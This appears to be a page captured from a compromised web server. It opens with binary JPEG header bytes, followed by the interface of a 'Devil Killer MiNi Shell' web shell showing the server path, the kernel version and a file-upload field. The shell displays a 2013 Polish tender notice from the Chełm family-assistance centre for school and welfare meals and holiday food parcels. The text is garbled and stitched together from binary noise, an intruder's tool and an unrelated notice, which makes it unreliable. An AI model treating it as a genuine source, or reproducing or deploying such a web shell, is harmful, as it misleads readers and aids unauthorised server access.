JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/473122-N-2013.html

<p class="kh_header"><b>Chełm: Przygotowanie i dostawa posiłków dla uczniów, dzieci, osób korzystających ze świadczeń Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie, mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie i osób, które własnym staraniem nie mogą go sobie zapewnić oraz dostawę świadczeń rzeczowych w postaci produktów żywnościowych w okresie świątecznym.</b><br>
<b>Numer ogłoszenia: 473122 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Chełmie , ul. Kolejowa 8, 22-100 Chełm, woj. lubelskie, tel. 0-82 564 78 90, 564 22 50, faks 0-82 565 82 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostawa posiłków dla uczniów, dzieci, osób korzystających ze świadczeń Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie, mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie i osób, które własnym staraniem nie mogą go sobie zapewnić oraz dostawę świadczeń rzeczowych w postaci produktów żywnościowych w okresie świątecznym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie i dostawa posiłków dla uczniów, dzieci, osób korzystających ze świadczeń Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie, mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie i osób, które własnym staraniem nie mogą go sobie zapewnić oraz dostawa świadczeń rzeczowych w postaci produktów żywnościowych w okresie świątecznym.
2. Przedmiot zamówienia podlega podziałowi na następujące zadania: 
Zadanie 1 - przygotowanie i dostawa w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Szkoły Podstawowej Nr 2 w Chełmie przy ul. Obłońskiej 51 - przewidywana dzienna ilość uczniów - 50. Prognozowana liczba obiadów - 8500.
Zadanie 2 - przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej Nr 2 w Chełmie przy ul. Partyzantów 27-29 - przewidywana dzienna ilość uczniów - 50. Prognozowana liczba obiadów - 8500.
Zadanie 3 - przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznego Gimnazjum Nr 5 z Oddziałami Integracyjnymi w Chełmie przy ul. Lubelskiej 8 - przewidywana dzienna ilość uczniów - 25. Prognozowana liczba obiadów - 4250.
Zadanie 4 - przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Zespołu Szkół Ogólnokształcących nr 8 w Chełmie przy ul. Połanieckiej 10 - przewidywana dzienna ilość uczniów - 65. Prognozowana liczba obiadów - 11050.
Zadanie 5 - przygotowanie, dostawa i wydawanie w dni nauki szkolnej obiadu składającego się z dwóch dań i napoju uczniom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Niepublicznej Szkoły Podstawowej z Oddziałami Integracyjnymi Razem w Chełmie przy ul. Reja 54 - przewidywana dzienna ilość uczniów - 65. Prognozowana liczba obiadów - 11050.
Zadanie 6 - przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Integracyjnego w Kasztanowym Parku w Chełmie przy ul. Lubelskiej 4 - przewidywana dzienna ilość dzieci - 60. Prognozowana liczba obiadów - 10200.
Zadanie 7 - przygotowanie, dostawa i wydawanie obiadu składającego się z dwóch dań i napoju dzieciom z rodzin objętych pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, uprawnionym do korzystania z tej formy dożywiania w porze obiadowej, uczęszczających do Przedszkola Niepublicznego z Oddziałami Integracyjnymi Razem w Chełmie przy ul. Botanicznej 16 - przewidywana dzienna ilość dzieci - 20. Prognozowana liczba obiadów - 3400.
Zadanie 8 - przygotowanie i dostawa obiadów składających się z dwóch dań i napoju dla uczestników Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Ogrodowej 36 - przewidywana ilość osób - 36 dziennie. Przewidywana liczba posiłków - 9072.
Przygotowane obiady dostarczane będą w dniach od poniedziałku do piątku w godzinach 13.30 - 14.00 do siedziby Domu Dziennego Pobytu w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Ogrodowej 36.  
Zadanie 9 - przygotowanie i dostawa 3 posiłków dziennie dla mieszkańców Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Wojsławickiej 11B - przewidywana ilość osób - 21. Przewidywana liczba posiłków obejmujących całodzienne wyżywienie  - 7560.
Przygotowanie posiłków dla mieszkańców Mieszkań Wieloprofilowych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie polega na przygotowaniu 3 posiłków dziennie tj. śniadania, obiadu składającego się z dwóch dań i kompotu oraz kolacji. Przygotowane posiłki dostarczane będą w każdy dzień tygodnia (również w soboty, niedziele i święta) do siedziby Mieszkań Wieloprofilowych Chronionych w Miejskim Ośrodku Pomocy Rodzinie w Chełmie przy ul. Wojsławickiej 11B. Śniadania dostarczane będą do godziny 8.30, obiady do godziny 13.00, kolacje do godziny 17.30. Zamawiający dopuszcza możliwość dostarczania tzw. suchego prowiantu na sobotę i niedzielę, w wyjątkowych, uzasadnionych przypadkach. 
Zadanie 10 - przygotowanie i dostawa w dni robocze obiadu składającego się z dwóch dań i napoju osobom objętym pomocą Miejskiego Ośrodka Pomocy Rodzinie w Chełmie, które własnym staraniem nie są w stanie zapewnić sobie posiłku - przewidywana ilość osób - 100  dziennie. Przewidywana liczba obiadów - 18000.
Przygotowane obiady dostarczane będą do godziny 13.00 do siedziby Miejskiego Ośrodka Pomocy Rodzinie w Chełmie  przy ul. Kolejowej 8. 
Zadanie 11 - dostawa świadczeń rzeczowych w postaci produktów żywnościowych (wraz z transportem i rozładunkiem do wskazanego przez Zamawiającego pomieszczenia) w okresie świątecznym dla podopiecznych Miejskiego Ośrodka Pomocy Rodzinie w Chełmie. Przewidywana liczba świadczeń - 200.
Zamawiający wymaga, aby produkty żywnościowe wchodzące w skład świadczeń rzeczowych odpowiadały przepisom określonym w ustawie o bezpieczeństwie żywności i żywienia oraz przepisach wykonawczych w szczególności dotyczących jakości oraz terminów przydatności do spożycia.
W skład świadczeń rzeczowych wchodzą następujące produkty żywnościowe: 
1) przetwory mięsne, w tym hermetycznie pakowane wędliny, konserwy
2) przetwory warzywne
3) przetwory mięsno-warzywne
4) przetwory rybne, śledzie
5) przetwory mączne: pieczywo, ciasto, makaron
6) tłuszcze zwierzęce i roślinne
7) cukier
8) przetwory mleczne; mleko
9) owoce/ sok
10) słodycze/ herbata
11) przetwory zbożowe.
Przed dostawą świadczenia Wykonawca uzgodni z Zamawiającym szczegółowy skład świadczenia rzeczowego w zakresie produktów żywnościowych i ich ilości.
Ze składu świadczeń rzeczowych wyklucza się produkty alkoholowe i używki.
Produkty żywnościowe składające się na świadczenie rzeczowe winny być zapakowane w torbę jednorazową.
Koszty związane z przygotowaniem i dostarczeniem świadczeń rzeczowych ponosi Wykonawca.
3. Zamawiający sporządzi wykaz imienny osób uprawnionych do korzystania z tej formy dożywiania. Wykaz określa imię i nazwisko, adres zamieszkania oraz okres przyznanego decyzją administracyjną świadczenia. Wykaz może być przez Zamawiającego  aktualizowany codziennie. Zamawiający telefonicznie będzie informował Wykonawcę o zmianie ilości posiłków do godziny 8.30.
4. Wykonawca wskaże osobę nadzorującą, przez co należy rozumieć sprawowanie bezpośredniego merytorycznego nadzoru nad realizacją przedmiotu zamówienia, z którą Zamawiający ma mieć skuteczny kontakt poprzez telefon stacjonarny lub telefon komórkowy.
1) adres Wykonawcy: 
     - telefon stacjonarny ................... i komórkowy .....................
      2)  osoba nadzorująca: 
     - telefon stacjonarny ................... i komórkowy ......................
5. W ramach wykonywania zamówienia do obowiązków Wykonawcy należy uzgodnienie z przedstawicielem danej szkoły lub przedszkola miejsca i sposobu wydawania posiłków w placówce.  
6. Wykonawca zobowiązany jest do świadczenia usług, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych oraz do przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, wynikających w szczególności z ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm.) oraz przepisów wykonawczych.
7. Wykonawca zobowiązuje się do przygotowania i dostarczenia posiłków odpowiadającym wymaganiom jakościowym i ilościowym oraz dostarczania dekadowych jadłospisów i do powiadamiania Zamawiającego o wszelkich przerwach w przygotowywaniu posiłków.
8. Wykonawca jest zobowiązany do zachowania  tajemnicy wszelkich danych przekazywanych przez Zamawiającego dotyczących świadczeniobiorców.  Zachowanie tajemnicy danych oznacza w szczególności nie ujawnianie, nie narażanie na ujawnienie, nie przekazywanie informacji przez Wykonawcę osobom trzecim w żaden sposób ani dla żadnych celów.
9. Wykonawca ponosi odpowiedzialność za ujawnienie, narażenie na ujawnienie oraz przekazanie informacji także dla swoich pracowników, chociażby nastąpiło to bez jego wiedzy i winy.
10. Zamawiający zastrzega sobie prawo kontroli realizacji zamówienia pod względem zgodności z zawartą umową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 15.10.00.00-9, 15.20.00.00-0, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zarówno w przypadku zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zarówno w przypadku 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia  wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ) odpowiednio dla zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią ten warunek, jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zarówno w przypadku zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia. Zarówno w przypadku 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia  wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ) odpowiednio dla zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11. Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączne doświadczenie Wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zarówno w przypadku zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania odpowiednim potencjałem technicznym. Zarówno w przypadku 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia  wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ) odpowiednio dla zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11. Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał techniczny Wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zarówno w przypadku zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia. Zarówno w przypadku 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia  wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ) odpowiednio dla zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11. Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał kadrowy Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zarówno w przypadku zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący sytuacji ekonomicznej i finansowej. Zarówno w przypadku 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11 ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ) odpowiednio dla zadania 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 i 11. Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączną sytuację ekonomiczną i finansową Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca reprezentowany przez pełnomocnika winien złożyć wraz z ofertą stosowny dokument pełnomocnictwa w oryginale ewentualnie notarialnie poświadczoną kopię pełnomocnictwa.
2. Jeżeli najkorzystniejszą ofertę złożą Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przed zawarciem umowy w sprawie zamówienia publicznego złożą umowę regulującą współpracę tych Wykonawców (art. 23 ust. 4 ustawy).
3. Wykonawca wraz z ofertą częściową winien złożyć decyzję właściwego Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu. 
4. Wykonawca wraz z ofertą częściową winien złożyć dokument, potwierdzający udostępnienie miejsca do wydawania posiłków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wzrostu cen, z przyczyn niezależnych od Wykonawcy, jednak nie wcześniej niż po 6 miesiącach realizacji zamówienia, nie częściej niż raz na kwartał i nie więcej niż o % wskaźnik wzrostu cen towarów i usług konsumpcyjnych. Wykonawca zobowiązany jest niezwłocznie poinformować o powyższym Zamawiającego na piśmie, podając nowy koszt jednego posiłku oraz dokumentując odpowiednio jego wzrost w celu podpisania aneksu do umowy w przedmiotowej sprawie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.chelm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Chełmie, ul. Kolejowa 8, 22-100 Chełm, Dział Organizacji i Nadzoru, Sekcja Administracji, pok. Nr 23..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 09:30, miejsce: Oferty należy składać w siedzibie Zamawiającego - Miejski Ośrodek Pomocy Rodzinie,    22-100 Chełm, ul. Kolejowa 8 w sekretariacie - pokój nr 21  lub za pośrednictwem poczty..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
